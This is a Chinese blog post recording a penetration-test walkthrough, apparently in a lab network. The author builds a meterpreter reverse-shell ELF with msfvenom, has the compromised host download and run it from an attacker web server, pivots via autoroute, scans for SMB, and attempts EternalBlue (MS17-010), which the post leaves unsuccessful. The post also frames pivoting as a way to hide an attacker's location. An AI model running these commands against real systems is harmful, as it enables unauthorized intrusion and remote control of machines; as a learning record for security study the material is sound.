内网渗透之内网渗透

内网渗透之内网渗透

注:这里出现很多失误,主要目的是为了记录(不喜欢的可以跳过)

emm,主要前篇一下写跑题所以强行中断下,继续k的渗透之路。

1、横向提权

此时已经拿到了CentOS的最高权限,可以查看数据等信息。但是这样还不够,在信息的过程中还发现了一台新的主机,不过它不在192.168.12.0/24这个网段,而是处于192.168.159.0/24这个网段的。如果想进行攻击的,此中会出现一点小麻烦,所以要想其他的办法了,这里采用的方式为 跳板机制。

扫盲行动:

Markup
网络跳板,简单来说,就是为了隐藏自己的地址,让别人无法查找到自己的位置。通过跳板的使用,可以减少他人查找到你的可能性,同时也增加了被发现的难度。
举个简单例子,你在A朋友家玩儿,发现了通往B朋友家的后门,然后你来到了B朋友家,又发现了C朋友家的厨房是和B朋友家相连的,你就顺便来到了C朋友的家,
同时C朋友家的厕所又是和D朋友家相连。你在A朋友家做了一些事情,比如设置和修改。A朋友回家了,他会发现有人进了自己的家,但是他顺着路线可以找到B朋友
家,通过长期的寻找,终于找到了C朋友家,但他遇见难题了,他并不知道是B朋友家的人动了自己的东西,还是D朋友家的人动了自己的东西。这时,你就是安全的
了。这中间的各种朋友关系,其实就是你的跳板。通过这种跳板的转换,我们可以改变自己上网的IP位置,隐藏自己的真实物理位置。

好了,前奏就到这里,开始搞事。

1-1、制作一个后门软件

新建一个窗口,开启web服务(方便文件传输)

Python
root@mtcx:~# systemctl restart apache2

image.png

使用命令生成一个木马

Python
root@mtcx:~# msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.12.53 LPORT=4444 -b "\x00" -f elf -o  /var/www/html/mtcx

命令解释
--platform 指定linux 
-f         指定elf 即linux操作系统的可执行文件类型 
-b         去掉坏字符

image.png

查看一下image.png

1-2、目标机下载文件

Python
[root@localhost ~]# wget http://192.168.12.53/mtcx

image.png

1-3、开启监听

配置参数

Python
msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp 
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.12.53
LHOST => 192.168.12.53
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444

image.png

开始监听

Python
msf5 exploit(multi/handler) > exploit

image.png

1-4、目标后门软件

软件提权

Python
[root@localhost ~]# chmod 777 mtcx

image.png

运行

Python
[root@localhost ~]# ./mtcx

image.png

1-5、获取到权限执行命令

Python
msf5 exploit(multi/handler) > exploit 
meterpreter > getuid

image.png

image.png

2、MSF跳板功能

获取目标内网相关信息

Python
meterpreter > run get_local_subnets

image.png

–>添加去往目标网段的转发路由

Python
meterpreter > run autoroute -s 192.168.159.0/24

image.png

–>查看路由添加情况

Python
meterpreter > run autoroute -p

image.png

将去往内网的路由打通后,接下来就可以使用MSF平台直接对内网主机扫描和进行各种高危漏洞的直接渗透利用了。

保存session到后

Python
meterpreter > background

image.png

查看下sesionsimage.png

使用端口转发模块验证目标开启了80端口

Python
msf5 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp 
msf5 auxiliary(scanner/portscan/tcp) > show options

image.png

设置下目标IP

Python
msf5 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.159.133
RHOSTS => 192.168.159.133

image.png

设置目标端口

Python
msf5 auxiliary(scanner/portscan/tcp) > set ports 80
ports => 80

image.png运行一下,可以访问

image.png

通过这种方式我们可以测试下内网中存在smb漏洞

Python
msf5 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.159.0/24
RHOSTS => 192.168.159.0/24
msf5 auxiliary(scanner/portscan/tcp) > set PORTS 445
PORTS => 445
msf5 auxiliary(scanner/portscan/tcp) > run

image.png

通过测试发现内网中存在一台.131的主机开放了445端口。

3、主机探测

Python
msf5 auxiliary(scanner/portscan/tcp) > use auxiliary/scanner/smb/smb_version 
msf5 auxiliary(scanner/smb/smb_version) > show options

image.png

设置下目标主机IP,扫描一下

Python
msf5 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.159.131
RHOSTS => 192.168.159.131
msf5 auxiliary(scanner/smb/smb_version) > run

image.png通过扫描发现目标系统为win7系统 sp1的,这就很nice呀刚好有win7对应的smb漏洞

Python
msf5 auxiliary(scanner/smb/smb_version) > search name:smb platform:windows

image.png

这里先使用ms17_010这个模块,测试下是否存在这个这个漏洞。

Python
msf5 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options

image.png

设置目标IP地址

Python
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.159.131
RHOSTS => 192.168.159.131
msf5 auxiliary(scanner/smb/smb_ms17_010) > run

image.png

可以看到目标是存在ms17-010这个漏洞

Python
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

image.png

设置下目标IP地址

Python
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.159.131
RHOSTS => 192.168.159.131

image.png

设置payload

Python
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp

image.png

设置监听IP,端口

Python
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.12.53
LHOST => 192.168.12.53
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 6666
LPORT => 6666

image.png

开始攻击

Python
msf5 exploit(windows/smb/ms17_010_eternalblue) > run

image.png

在这里发现通过多次尝试,发现虽然漏洞是可以利用的但是却无法建立连接image.png

在经过一番询问度娘后发现这是因为payload的原因,这里更换payload,重新开始

Python
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp

image.png

应为之前payload改变过端口,所以被继承下来,直接开始run

Python
msf5 exploit(windows/smb/ms17_010_eternalblue) > run

image.pngimage.png欸,还是没有获取到连接,难受 ≧ ﹏ ≦

posted @ 2020-06-08 15:06  MTcx  阅读(458)  评论(0编辑  收藏  举报